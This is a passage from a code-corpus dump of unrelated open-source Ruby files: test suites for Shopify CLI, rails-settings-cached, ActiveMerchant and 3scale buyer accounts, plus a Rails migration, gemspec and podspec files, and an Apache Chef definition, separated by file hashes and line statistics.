@ctx.puts('command!')
end
end
end
def setup
@log = Tempfile.new
super
end
def test_prerequisite_task
executor = ShopifyCli::Core::Executor.new(@context, @registry, log_file: @log)
reg = CLI::Kit::CommandRegistry.new(default: nil, contextual_resolver: nil)
reg.add(FakeCommand, :fake)
@context.expects(:puts).with('success!')
@context.expects(:puts).with('command!')
executor.call(FakeCommand, 'fake', [])
end
def test_options
executor = ShopifyCli::Core::Executor.new(@context, @registry, log_file: @log)
reg = CLI::Kit::CommandRegistry.new(default: nil, contextual_resolver: nil)
reg.add(FakeCommand, :fake)
@context.expects(:puts).with('success!')
@context.expects(:puts).with('verbose!')
executor.call(FakeCommand, 'fake', ['-v'])
end
def test_subcommand
executor = ShopifyCli::Core::Executor.new(@context, @registry, log_file: @log)
reg = CLI::Kit::CommandRegistry.new(default: nil, contextual_resolver: nil)
reg.add(FakeCommand, :fake)
@context.expects(:puts).with('success!')
@context.expects(:puts).with('subcommand!')
executor.call(FakeCommand, 'fake', ['fakesub'])
end
end
end
end
| 29.328571 | 86 | 0.59133 |
610e1c095567d90162ed3ddb75e22f2bfd79ff49 | 12,841 | # frozen_string_literal: true
require "test_helper"
# rubocop:disable Lint/ConstantDefinitionInBlock
class BaseTest < ActiveSupport::TestCase
def find_value(var_name)
Setting.where(var: var_name).take
end
def direct_update_record(var, value)
record = find_value(var) || Setting.new(var: var)
record[:value] = YAML.dump(value)
record.save!(validate: false)
end
def assert_no_record(var)
record = find_value(:admin_emails)
assert_nil record, message: "#{var} should not have database record."
end
def assert_record_value(var, val)
record = find_value(var)
assert_not_nil record
assert_equal val.to_yaml, record[:value]
assert_equal val, record.value
end
test "define setting with protected keys" do
assert_raise(RailsSettings::ProcetedKeyError, "Can't use var as setting key.") do
class NewSetting < RailsSettings::Base
field :var
end
end
assert_raise(RailsSettings::ProcetedKeyError, "Can't use value as setting key.") do
class NewSetting < RailsSettings::Base
field :value
end
end
end
test "cache_prefix and cache_key" do
assert_equal "rails-settings-cached/v1", Setting.cache_key
Setting.cache_prefix { "v2" }
assert_equal "rails-settings-cached/v2", Setting.cache_key
end
test "all_settings" do
assert_equal({}, Setting.send(:_all_settings))
end
test "setting_keys" do
assert_equal 15, Setting.keys.size
assert_includes(Setting.keys, "host")
assert_includes(Setting.keys, "readonly_item")
assert_includes(Setting.keys, "default_tags")
assert_includes(Setting.keys, "omniauth_google_options")
assert_equal 12, Setting.editable_keys.size
assert_includes(Setting.editable_keys, "host")
assert_includes(Setting.editable_keys, "default_tags")
assert_equal 3, Setting.readonly_keys.size
assert_includes(Setting.readonly_keys, "readonly_item")
assert_includes(Setting.readonly_keys, "readonly_item_with_proc")
assert_includes(Setting.readonly_keys, "omniauth_google_options")
end
test "get_field" do
assert_equal({}, Setting.get_field("foooo"))
assert_equal(
{scope: :application, key: "host", default: "http://example.com", type: :string, readonly: false, options: {}},
Setting.get_field("host")
)
assert_equal(
{scope: :omniauth, key: "omniauth_google_options", default: {client_id: "the-client-id", client_secret: "the-client-secret"}, type: :hash, readonly: true, options: {}},
Setting.get_field("omniauth_google_options")
)
end
test "defined_fields and scope" do
scopes = Setting.defined_fields.select { |field| !field[:readonly] }.group_by { |field| field[:scope] || :none }
# assert_equal 2, groups.length
assert_equal %i[application contents mailer none], scopes.keys
assert_equal 4, scopes[:application].length
assert_equal 5, scopes[:contents].length
assert_equal 2, scopes[:mailer].length
end
test "not exist field" do
assert_raise(NoMethodError) { Setting.not_exist_method }
end
test "readonly field" do
assert_equal 100, Setting.readonly_item
assert_raise(NoMethodError) { Setting.readonly_item = 1 }
assert_equal 103, Setting.readonly_item_with_proc
assert_kind_of Hash, Setting.omniauth_google_options
assert_equal "the-client-id", Setting.omniauth_google_options[:client_id]
assert_equal "the-client-secret", Setting.omniauth_google_options[:client_secret]
assert_raise(NoMethodError) { Setting.omniauth_google_options = {foo: 1} }
end
test "instance method get field" do
setting = Setting.new
assert_equal Setting.host, setting.host
assert_equal Setting.default_tags, setting.default_tags
assert_equal Setting.readonly_item, setting.readonly_item
assert_equal 103, setting.readonly_item_with_proc
end
test "value serialize" do
assert_equal 1, Setting.user_limits
Setting.user_limits = 12
assert_equal 12, Setting.user_limits
assert_record_value :user_limits, 12
end
test "string field" do
assert_equal "http://example.com", Setting.host
Setting.host = "https://www.example.com"
assert_equal "https://www.example.com", Setting.host
Setting.host = "https://www.rubyonrails.org"
assert_equal "https://www.rubyonrails.org", Setting.host
end
test "integer field" do
assert_equal 1, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_no_record :user_limits
Setting.user_limits = 12
assert_equal 12, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_record_value :user_limits, 12
Setting.user_limits = "27"
assert_equal 27, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_record_value :user_limits, 27
Setting.user_limits = 2.7
assert_equal 2, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_record_value :user_limits, 2
assert_equal 2, Setting.default_value_with_block
Setting.default_value_with_block = 100
assert_equal 100, Setting.default_value_with_block
end
test "float field" do
assert_equal 7, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_no_record :float_item
Setting.float_item = 9
assert_equal 9, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_record_value :float_item, 9.to_f
Setting.float_item = 2.9
assert_equal 2.9, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_record_value :float_item, 2.9
Setting.float_item = "2.9"
assert_equal 2.9, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_record_value :float_item, "2.9".to_f
end
test "big decimal field" do
assert_equal 9, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_no_record :big_decimal_item
Setting.big_decimal_item = 7
assert_equal 7, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_record_value :big_decimal_item, 7.to_d
Setting.big_decimal_item = 2.9
assert_equal 2.9, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_record_value :big_decimal_item, 2.9.to_d
Setting.big_decimal_item = "2.9"
assert_equal 2.9, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_record_value :big_decimal_item, "2.9".to_d
end
test "array field" do
assert_equal %w[[email protected]], Setting.admin_emails
assert_no_record :admin_emails
new_emails = %w[[email protected] [email protected]]
Setting.admin_emails = new_emails
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join("\n")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join(",")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join(";")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join(" , ")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
end
test "hash field" do
default_value = {
host: "foo.com",
username: "[email protected]",
password: "123456"
}
assert_equal default_value, Setting.smtp_settings
assert_no_record :smtp_settings
# sym keys
new_value = {
title: "123",
name: "456"
}
Setting.smtp_settings = new_value
record = find_value(:smtp_settings)
assert_equal new_value.deep_stringify_keys, Setting.smtp_settings
assert_record_value :smtp_settings, new_value
# string keys
new_value = {
"title" => "456",
"age" => 32,
"name" => "Jason Lee"
}
Setting.smtp_settings = new_value
assert_equal new_value.deep_stringify_keys, Setting.smtp_settings
assert_equal "456", Setting.smtp_settings[:title]
assert_equal "456", Setting.smtp_settings["title"]
assert_equal 32, Setting.smtp_settings[:age]
assert_equal 32, Setting.smtp_settings["age"]
assert_equal "Jason Lee", Setting.smtp_settings[:name]
assert_equal "Jason Lee", Setting.smtp_settings["name"]
assert_record_value :smtp_settings, new_value
# JSON key
new_value = {
"sym" => :symbol,
"str" => "string",
"num" => 27.72,
"float" => 9.to_f,
"big_decimal" => 2.9.to_d
}
Setting.smtp_settings = new_value
assert_equal new_value.deep_stringify_keys, Setting.smtp_settings
assert_equal :symbol, Setting.smtp_settings[:sym]
assert_equal :symbol, Setting.smtp_settings["sym"]
assert_equal "string", Setting.smtp_settings["str"]
assert_equal "string", Setting.smtp_settings[:str]
assert_equal 27.72, Setting.smtp_settings["num"]
assert_equal 9.to_f, Setting.smtp_settings["float"]
assert_equal 2.9.to_d, Setting.smtp_settings["big_decimal"]
assert_record_value :smtp_settings, new_value
Setting.find_by(var: :smtp_settings).update(value: new_value.to_json)
assert_equal({"sym" => "symbol", "str" => "string", "num" => 27.72, "float" => 9.to_f, "big_decimal" => "2.9"}, Setting.smtp_settings)
assert_equal "symbol", Setting.smtp_settings[:sym]
assert_equal "symbol", Setting.smtp_settings["sym"]
end
test "boolean field" do
assert_equal true, Setting.captcha_enable
assert_no_record :captcha_enable
Setting.captcha_enable = "0"
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = "1"
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
Setting.captcha_enable = "false"
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = "true"
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
Setting.captcha_enable = 0
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = 1
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
Setting.captcha_enable = false
assert_equal false, Setting.captcha_enable
assert_equal false, Setting.captcha_enable?
Setting.captcha_enable = true
assert_equal true, Setting.captcha_enable
assert_equal true, Setting.captcha_enable?
end
test "string value in db compatible" do
# array
direct_update_record(:admin_emails, "[email protected],[email protected]\[email protected]")
assert_equal 3, Setting.admin_emails.length
assert_kind_of Array, Setting.admin_emails
assert_equal %w[[email protected] [email protected] [email protected]], Setting.admin_emails
# integer
direct_update_record(:user_limits, "100")
assert_equal 100, Setting.user_limits
assert_kind_of Integer, Setting.user_limits
# boolean
direct_update_record(:captcha_enable, "0")
assert_equal false, Setting.captcha_enable
direct_update_record(:captcha_enable, "false")
assert_equal false, Setting.captcha_enable
direct_update_record(:captcha_enable, "true")
assert_equal true, Setting.captcha_enable
direct_update_record(:captcha_enable, "1")
assert_equal true, Setting.captcha_enable
end
test "array with separator" do
value = <<~TIP
Hello this is first line, and have comma.
This is second line.
TIP
direct_update_record(:tips, value)
assert_equal 2, Setting.tips.length
assert_equal "Hello this is first line, and have comma.", Setting.tips[0]
assert_equal "This is second line.", Setting.tips[1]
value = "Ruby Rails,GitHub"
direct_update_record(:default_tags, value)
assert_equal %w[Ruby Rails GitHub], Setting.default_tags
end
test "key with complex options" do
assert_equal %w[foo bar], Setting.key_with_more_options
field = Setting.get_field(:key_with_more_options)
assert_equal({scope: nil, key: "key_with_more_options", default: ["foo", "bar"], type: :array, readonly: false, options: {foo: 1, section: :theme}}, field)
end
test "rails_scope" do
assert_kind_of ActiveRecord::Relation, Setting.ordered
assert_equal %(SELECT "settings".* FROM "settings" ORDER BY "settings"."id" DESC), Setting.ordered.to_sql
assert_equal %(SELECT "settings".* FROM "settings" WHERE (var like 'readonly_%')), Setting.by_prefix("readonly_").to_sql
assert_equal "foo", Setting.by_prefix("readonly_").foo
end
end
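# A minimal sketch of the kind of Setting class these assertions exercise (an
# illustrative assumption -- the real fixture lives elsewhere in the test suite):
#
#   class Setting < RailsSettings::Base
#     cache_prefix { "v1" }
#
#     scope :application do
#       field :host, type: :string, default: "http://example.com"
#       field :user_limits, type: :integer, default: 1
#     end
#
#     field :readonly_item, type: :integer, default: 100, readonly: true
#   end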
| 35.374656 | 174 | 0.73569 |
bb70fa82339ad5376d53dda74c580bb167d6c933 | 1,825 | # Copyright © 2020 MUSC Foundation for Research Development~
# All rights reserved.~
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:~
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.~
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following~
# disclaimer in the documentation and/or other materials provided with the distribution.~
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products~
# derived from this software without specific prior written permission.~
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,~
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT~
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL~
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS~
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR~
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.~
class AddCayuseRelations < ActiveRecord::Migration[5.2]
def change
create_join_table :research_masters, :protocols, table_name: "research_master_cayuse_relations" do |t|
t.index :research_master_id
t.index :protocol_id
t.timestamps
end
end
end
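# A sketch (assumption, not defined by this migration) of how the join table
# created above might be exposed on the models:
#
#   class ResearchMaster < ApplicationRecord
#     has_and_belongs_to_many :protocols,
#       join_table: "research_master_cayuse_relations"
#   end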
| 60.833333 | 146 | 0.788493 |
e2bb22b51c5c037954227ae9e545d3a49761f71d | 187 | class ActsAsUrlParam::BlogPost < ActsAsUrlParamBase
acts_as_url_param do |candidate|
url_param_available_for_model?(candidate) &&
Story.url_param_available?(candidate)
end
end | 31.166667 | 51 | 0.802139 |
4a3da34405b5be2e4d97ea0dc76d7687d5a3883f | 2,480 | require File.dirname(__FILE__) + '/../test_helper'
class CheckTest < Test::Unit::TestCase
include ActiveMerchant::Billing
VALID_ABA = '111000025'
INVALID_ABA = '999999999'
MALFORMED_ABA = 'I like fish'
ACCOUNT_NUMBER = '123456789012'
def test_validation
c = Check.new
assert !c.valid?
assert !c.errors.empty?
end
def test_first_name_last_name
check = Check.new(:name => 'Fred Bloggs')
assert_equal 'Fred', check.first_name
assert_equal 'Bloggs', check.last_name
assert_equal 'Fred Bloggs', check.name
end
def test_nil_name
check = Check.new(:name => nil)
assert_nil check.first_name
assert_nil check.last_name
assert_equal "", check.name
end
def test_valid
c = Check.new(:name => 'Fred Bloggs',
:routing_number => VALID_ABA,
:account_number => ACCOUNT_NUMBER,
:account_holder_type => 'personal',
:account_type => 'checking')
assert c.valid?
end
def test_invalid_routing_number
c = Check.new(:routing_number => INVALID_ABA)
assert !c.valid?
assert_equal c.errors.on(:routing_number), "is invalid"
end
def test_malformed_routing_number
c = Check.new(:routing_number => MALFORMED_ABA)
assert !c.valid?
assert_equal c.errors.on(:routing_number), "is invalid"
end
def test_account_holder_type
c = Check.new
c.account_holder_type = 'business'
c.valid?
assert !c.errors.on(:account_holder_type)
c.account_holder_type = 'personal'
c.valid?
assert !c.errors.on(:account_holder_type)
c.account_holder_type = 'pleasure'
c.valid?
assert_equal c.errors.on(:account_holder_type), 'must be personal or business'
c.account_holder_type = nil
c.valid?
assert !c.errors.on(:account_holder_type)
end
def test_account_type
c = Check.new
c.account_type = 'checking'
c.valid?
assert !c.errors.on(:account_type)
c.account_type = 'savings'
c.valid?
assert !c.errors.on(:account_type)
c.account_type = 'moo'
c.valid?
assert_equal c.errors.on(:account_type), "must be checking or savings"
c.account_type = nil
c.valid?
assert !c.errors.on(:account_type)
end
end
| 25.56701 | 82 | 0.653226 |
61ab547f81e7937163b3acbd1305704309b2a37c | 566 | Pod::Spec.new do |s|
s.name = "DTMHeatmap"
s.version = "1.0"
s.summary = "An MKMapView overlay to visualize location data"
s.homepage = "https://github.com/dataminr/DTMHeatmap"
s.license = 'MIT'
s.author = { "Bryan Oltman" => "[email protected]" }
s.social_media_url = "http://twitter.com/moltman"
s.platform = :ios
s.source = { :git => "https://github.com/dataminr/DTMHeatmap.git", :tag => '1.0' }
s.source_files = '*.{h,m}', 'Heatmaps/*', 'Color Providers/*'
s.requires_arc = true
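# Illustrative Podfile entry for an app consuming this spec:
#
#   pod 'DTMHeatmap', '~> 1.0'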
end
| 40.428571 | 90 | 0.586572 |
f8aeff8eea7d7f43224e444c9d7f84241b97717e | 675 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, 'package.json')))
Pod::Spec.new do |s|
s.name = "ReactNativeShareExtension"
s.version = package['version']
s.summary = package['description']
s.license = package['license']
s.authors = package['author']
s.homepage = package['repository']['url']
s.platform = :ios, "9.0"
s.ios.deployment_target = '9.0'
s.tvos.deployment_target = '10.0'
s.source = { :git => "https://github.com/marcinolek/react-native-share-extension.git", :tag => "master" }
s.source_files = "ios/**/*.{h,m}"
s.dependency 'React'
s.dependency 'React-CoreModules'
end | 29.347826 | 113 | 0.623704 |
f79bde03a1b7b84349f88be80ce8adeb09284b25 | 142 | class ImplementationStage < ApplicationRecord
belongs_to :initiative
validates :title, :body, :start_date, :end_date, presence: true
end
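# Illustrative use of the validations above (the initiative object is assumed to
# exist elsewhere):
#
#   stage = ImplementationStage.new(initiative: initiative, title: 'Phase 1')
#   stage.valid? # => false until body, start_date and end_date are also present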
| 23.666667 | 65 | 0.788732 |
214e487eeeb0a63ab7e13d32f79be9e8fd66ece1 | 1,338 | require 'erb'
require_relative 'template_processor'
module Compiler
class MustacheProcessor < TemplateProcessor
@@yield_hash = {
after_header: "{{{ afterHeader }}}",
body_classes: "{{ bodyClasses }}",
body_start: "{{{ bodyStart }}}",
body_end: "{{{ bodyEnd }}}",
content: "{{{ content }}}",
cookie_message: "{{{ cookieMessage }}}",
footer_support_links: "{{{ footerSupportLinks }}}",
footer_top: "{{{ footerTop }}}",
head: "{{{ head }}}",
header_class: "{{{ headerClass }}}",
html_lang: "{{ htmlLang }}",
inside_header: "{{{ insideHeader }}}",
page_title: "{{ pageTitle }}",
proposition_header: "{{{ propositionHeader }}}",
top_of_page: "{{{ topOfPage }}}"
}
def handle_yield(section = :layout)
@@yield_hash[section]
end
def asset_path(file, options={})
query_string = GovukTemplate::VERSION
return "#{file}?#{query_string}" if @is_stylesheet
case File.extname(file)
when '.css'
"{{{ assetPath }}}stylesheets/#{file}?#{query_string}"
when '.js'
"{{{ assetPath }}}javascripts/#{file}?#{query_string}"
else
"{{{ assetPath }}}images/#{file}?#{query_string}"
end
end
def content_for?(*args)
@@yield_hash.include? args[0]
end
end
end
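# Example of the substitution this processor performs (constructor arguments are
# assumed -- they are defined by TemplateProcessor, not shown here):
#
#   processor = Compiler::MustacheProcessor.new(...)
#   processor.handle_yield(:content)        # => "{{{ content }}}"
#   processor.asset_path('application.js')  # => "{{{ assetPath }}}javascripts/application.js?<GovukTemplate::VERSION>"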
| 28.468085 | 62 | 0.573244 |
0129e5cd9cb5f2059e30a4fc963c79c1acc5d891 | 2,013 | #
# Cookbook Name:: apache2
# Definition:: apache_module
#
# Copyright 2008-2013, Opscode, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
define :apache_module, :enable => true, :conf => false do
include_recipe 'apache2::default'
params[:filename] = params[:filename] || "mod_#{params[:name]}.so"
params[:module_path] = params[:module_path] || "#{node['apache']['libexecdir']}/#{params[:filename]}"
params[:identifier] = params[:identifier] || "#{params[:name]}_module"
apache_conf params[:name] if params[:conf]
if platform_family?('rhel', 'fedora', 'arch', 'suse', 'freebsd')
file "#{node['apache']['dir']}/mods-available/#{params[:name]}.load" do
content "LoadModule #{params[:identifier]} #{params[:module_path]}\n"
mode '0644'
end
end
if params[:enable]
execute "a2enmod #{params[:name]}" do
command "/usr/sbin/a2enmod #{params[:name]}"
notifies :restart, 'service[apache2]'
not_if do
::File.symlink?("#{node['apache']['dir']}/mods-enabled/#{params[:name]}.load") &&
(::File.exists?("#{node['apache']['dir']}/mods-available/#{params[:name]}.conf") ? ::File.symlink?("#{node['apache']['dir']}/mods-enabled/#{params[:name]}.conf") : true)
end
end
else
execute "a2dismod #{params[:name]}" do
command "/usr/sbin/a2dismod #{params[:name]}"
notifies :restart, 'service[apache2]'
only_if { ::File.symlink?("#{node['apache']['dir']}/mods-enabled/#{params[:name]}.load") }
end
end
end
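# A usage sketch from a hypothetical recipe (module names here are examples only):
#
#   apache_module 'expires'
#
#   apache_module 'status' do
#     conf true
#   end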
| 37.981132 | 177 | 0.657228 |
1add8e92af02a6e579f5292d72de6053d0f1f90c | 1,497 | # encoding: UTF-8
Gem::Specification.new do |s|
s.platform = Gem::Platform::RUBY
s.name = 'spree_zaez_cielo'
s.version = '3.0.12'
s.summary = 'Adds Cielo as a Payment Method to Spree Commerce'
s.description = s.summary
s.required_ruby_version = '>= 2.0.0'
s.author = 'Zaez Team'
s.email = '[email protected]'
s.homepage = 'https://github.com/zaeznet/spree_zaez_cielo'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.require_path = 'lib'
s.requirements << 'none'
s.add_dependency 'spree_core', '~> 3.2.0'
s.add_dependency 'cielo', '~> 0.1.5'
s.add_development_dependency 'poltergeist', '~> 1.5.0'
s.add_development_dependency 'capybara', '~> 2.4'
s.add_development_dependency 'coffee-rails'
s.add_development_dependency 'database_cleaner'
s.add_development_dependency 'factory_girl', '~> 4.5'
s.add_development_dependency 'factory_girl_rails'
s.add_development_dependency 'ffaker'
s.add_development_dependency 'rspec-rails', '~> 3.1'
s.add_development_dependency 'sass-rails', '~> 5.0.0.beta1'
s.add_development_dependency 'selenium-webdriver'
s.add_development_dependency 'simplecov'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'guard'
s.add_development_dependency 'guard-bundler'
s.add_development_dependency 'guard-rspec'
s.add_development_dependency 'guard-shell'
s.add_development_dependency 'http_logger'
end
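# Illustrative Gemfile entry for a Spree 3.2 store using this extension:
#
#   gem 'spree_zaez_cielo', '~> 3.0'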
| 37.425 | 70 | 0.718103 |
01d9e1ff45421560a69cb18e0619774ae1930a46 | 13,664 | # frozen_string_literal: true
require 'test_helper'
class Buyers::AccountsControllerTest < ActionDispatch::IntegrationTest
class WebhookCreationTest < ActionDispatch::IntegrationTest
disable_transactional_fixtures!
def setup
@buyer = FactoryBot.create :buyer_account
@provider = @buyer.provider_account
login! @provider
end
test 'POST creates the user and the account also when extra_fields are sent' do
FactoryBot.create(:fields_definition, account: @provider, target: 'User', name: 'created_by')
post admin_buyers_accounts_path, params: {
account: {
org_name: 'Alaska',
user: { email: '[email protected]', extra_fields: { created_by: 'hi' }, password: '123456', username: 'hello' }
}
}
account = Account.last
user = User.last
assert_equal 'Alaska', account.org_name
assert_equal '[email protected]', user.email
assert_equal 'hello', user.username
assert_equal 'hi', user.extra_fields['created_by']
end
test 'billing address extra field and webhooks' do
FactoryBot.create(:fields_definition, account: @provider,
target: 'Account', name: 'billing_address', read_only: true)
@provider.settings.allow_web_hooks!
WebHook.delete_all
FactoryBot.create(:webhook, account: @provider, account_created_on: true, active: true)
assert_difference @provider.buyers.method(:count) do
assert_equal 0, WebHookWorker.jobs.size
post admin_buyers_accounts_path, params: {
account: {
org_name: 'hello', org_legaladdress: 'address',
user: { username: 'hello', email: '[email protected]', password: 'password'}
}
}
assert_equal 1, WebHookWorker.jobs.size
assert_response :redirect
end
account = Account.last!
assert account.approved?
assert_equal 'hello', account.org_name
assert_equal 'address', account.org_legaladdress
end
end
class MemberPermissionsTest < Buyers::AccountsControllerTest
def setup
@provider = FactoryBot.create(:provider_account)
@user = FactoryBot.create(:active_user, account: provider, role: :member, member_permission_ids: [:partners])
login! provider, user: user
end
attr_reader :user, :provider
def test_show
buyer = FactoryBot.create(:buyer_account, provider_account: provider)
service = FactoryBot.create(:service, account: provider)
plan = FactoryBot.create(:application_plan, issuer: service)
plan.publish!
buyer.buy! plan
cinstance = service.cinstances.last
cinstance.update(name: 'Alaska Application App')
User.any_instance.expects(:has_access_to_all_services?).returns(true).at_least_once
get admin_buyers_account_path(buyer)
assert_response :success
assert_match 'Alaska Application App', response.body
User.any_instance.expects(:has_access_to_all_services?).returns(false).at_least_once
get admin_buyers_account_path(buyer)
assert_response :success
assert_not_match 'Alaska Application App', response.body
User.any_instance.expects(:member_permission_service_ids).returns([service.id]).at_least_once
get admin_buyers_account_path(buyer)
assert_response :success
assert_match 'Alaska Application App', response.body
end
test 'member user without billing permission cannot manage invoice' do
buyer = FactoryBot.create(:simple_buyer, provider_account: provider)
provider.settings.allow_finance!
get admin_buyers_account_invoices_path(buyer)
assert_response :forbidden
assert_no_difference -> { Invoice.count } do
post admin_buyers_account_invoices_path(buyer)
assert_response :forbidden
end
invoice = FactoryBot.create(:invoice, buyer_account: buyer, provider_account: provider)
get edit_admin_buyers_account_invoice_path(buyer, invoice)
assert_response :forbidden
end
test 'member user with billing permission can manage invoice' do
user.member_permission_ids = %i[partners finance]
user.save!
buyer = FactoryBot.create(:simple_buyer, provider_account: provider)
provider.settings.allow_finance!
get admin_buyers_account_invoices_path(buyer)
assert_response :success
assert_difference -> { Invoice.count }, 1 do
post admin_buyers_account_invoices_path(buyer)
assert_response :redirect
end
invoice = FactoryBot.create(:invoice, buyer_account: buyer, provider_account: provider)
get edit_admin_buyers_account_invoice_path(buyer, invoice)
assert_response :success
end
test "can't manage buyer accounts" do
user.member_permission_ids = []
user.save!
get admin_buyers_accounts_path
assert_response :forbidden
get new_admin_buyers_account_path
assert_response :forbidden
buyer = FactoryBot.create(:simple_buyer, provider_account: provider, name: 'bob')
get admin_buyers_account_path(buyer)
assert_response :forbidden
get edit_admin_buyers_account_path(buyer)
assert_response :forbidden
put admin_buyers_account_path(buyer), params: {account: {name: 'carl'}}
assert_response :forbidden
assert_equal 'bob', buyer.reload.name
delete admin_buyers_account_path(buyer)
assert_response :forbidden
assert Account.exists?(buyer.id)
assert_no_difference(Account.method(:count)) do
post admin_buyers_accounts_path, params: {
account: {
name: 'secret agent',
user: { username: 'johndoe', email: '[email protected]', password: 'secretpassword' }
}
}
end
assert_response :forbidden
end
end
class ProviderLoggedInTest < Buyers::AccountsControllerTest
def setup
@buyer = FactoryBot.create(:buyer_account, name: 'bob')
@provider = @buyer.provider_account
login! @provider
end
test '#new and #create redirect if the provider only has a non-default account plan' do
@provider.account_plans.delete_all
@provider.account_plans.create!(name: 'non default account plan')
post admin_buyers_accounts_path, params: {
account: {
org_name: 'Alaska',
user: { email: '[email protected]', password: '123456', username: 'hello' }
}
}
assert_redirected_to admin_buyers_account_plans_path
assert_equal 'Please, create an Account Plan first', flash[:alert]
end
test 'POST with an error outside account or user is shown as a flash error' do
errors = ActiveModel::Errors.new(Plan.new)
errors.add(:base, 'error that is not in "user" or "account"')
errors.add(:base, 'another error')
Signup::Result.any_instance.stubs(errors: errors)
post admin_buyers_accounts_path, params: {
account: {
org_name: 'Alaska',
user: { email: '[email protected]', password: '123456', username: 'hello' }
}
}
assert_equal 'error that is not in "user" or "account". another error', flash[:error]
end
# regression test for: https://github.com/3scale/system/issues/2567
test "not raise exception on update if params[:account] is nil" do
put admin_buyers_account_path @buyer
assert_equal "Required parameter missing: account", response.body
end
test 'checks if link under number of applications is correct' do
@provider.settings.allow_multiple_applications!
service = FactoryBot.create(:service, account: @provider)
FactoryBot.create_list(:application, 2, user_account: @buyer, service: @provider.default_service)
FactoryBot.create_list(:application, 3, service: service, user_account: @buyer)
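# 2 applications on the default service plus 3 on the extra service => the link should show 5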
get admin_buyers_accounts_path
assert_select %(td a[href="#{admin_buyers_account_applications_path(@buyer)}"]), text: '5'
end
test 'checks if link under number of applications is correct as member' do
@provider.settings.allow_multiple_applications!
service = FactoryBot.create(:service, account: @provider)
FactoryBot.create_list(:application, 2, user_account: @buyer)
FactoryBot.create_list(:application, 3, service: service, user_account: @buyer)
# Testing member permissions
member = FactoryBot.create(:member, account: @provider)
member.member_permission_service_ids = [service.id]
member.save!
login! @provider, user: member
get admin_buyers_accounts_path
assert_select %(td a[href="#{admin_buyers_account_applications_path(@buyer)}"]), text: '3'
end
test '#create' do
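# Without user attributes the signup fails validation and the form is re-rendered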
assert_no_difference(-> { @provider.buyers.count }) do
post admin_buyers_accounts_path, params: {
account: {
org_name: 'My organization'
}
}
assert_select '#account_user_username_input.required.error'
assert_response :success
end
assert_difference(-> { @provider.buyers.count }) do
post admin_buyers_accounts_path, params: {
account: {
org_name: 'My organization',
user: {
username: 'johndoe',
email: '[email protected]',
password: 'secretpassword'
}
}
}
assert_response :redirect
end
end
test "can't manage buyer's of other providers" do
another_provider = FactoryBot.create(:provider_account)
login! another_provider
get admin_buyers_accounts_path
assert assigns(:presenter).buyers
assert_equal 0, assigns(:presenter).buyers.size
get admin_buyers_account_path(@buyer)
assert_response :not_found
get edit_admin_buyers_account_path(@buyer)
assert_response :not_found
put admin_buyers_account_path(@buyer), params: {account: {name: 'mike'}}
assert_response :not_found
assert_equal 'bob', @buyer.reload.name
delete admin_buyers_account_path(@buyer)
assert_response :not_found
assert Account.exists?(@buyer.id)
end
test 'index/search & show display the admin_user_display_name' do
get admin_buyers_accounts_path
page = Nokogiri::HTML::Document.parse(response.body)
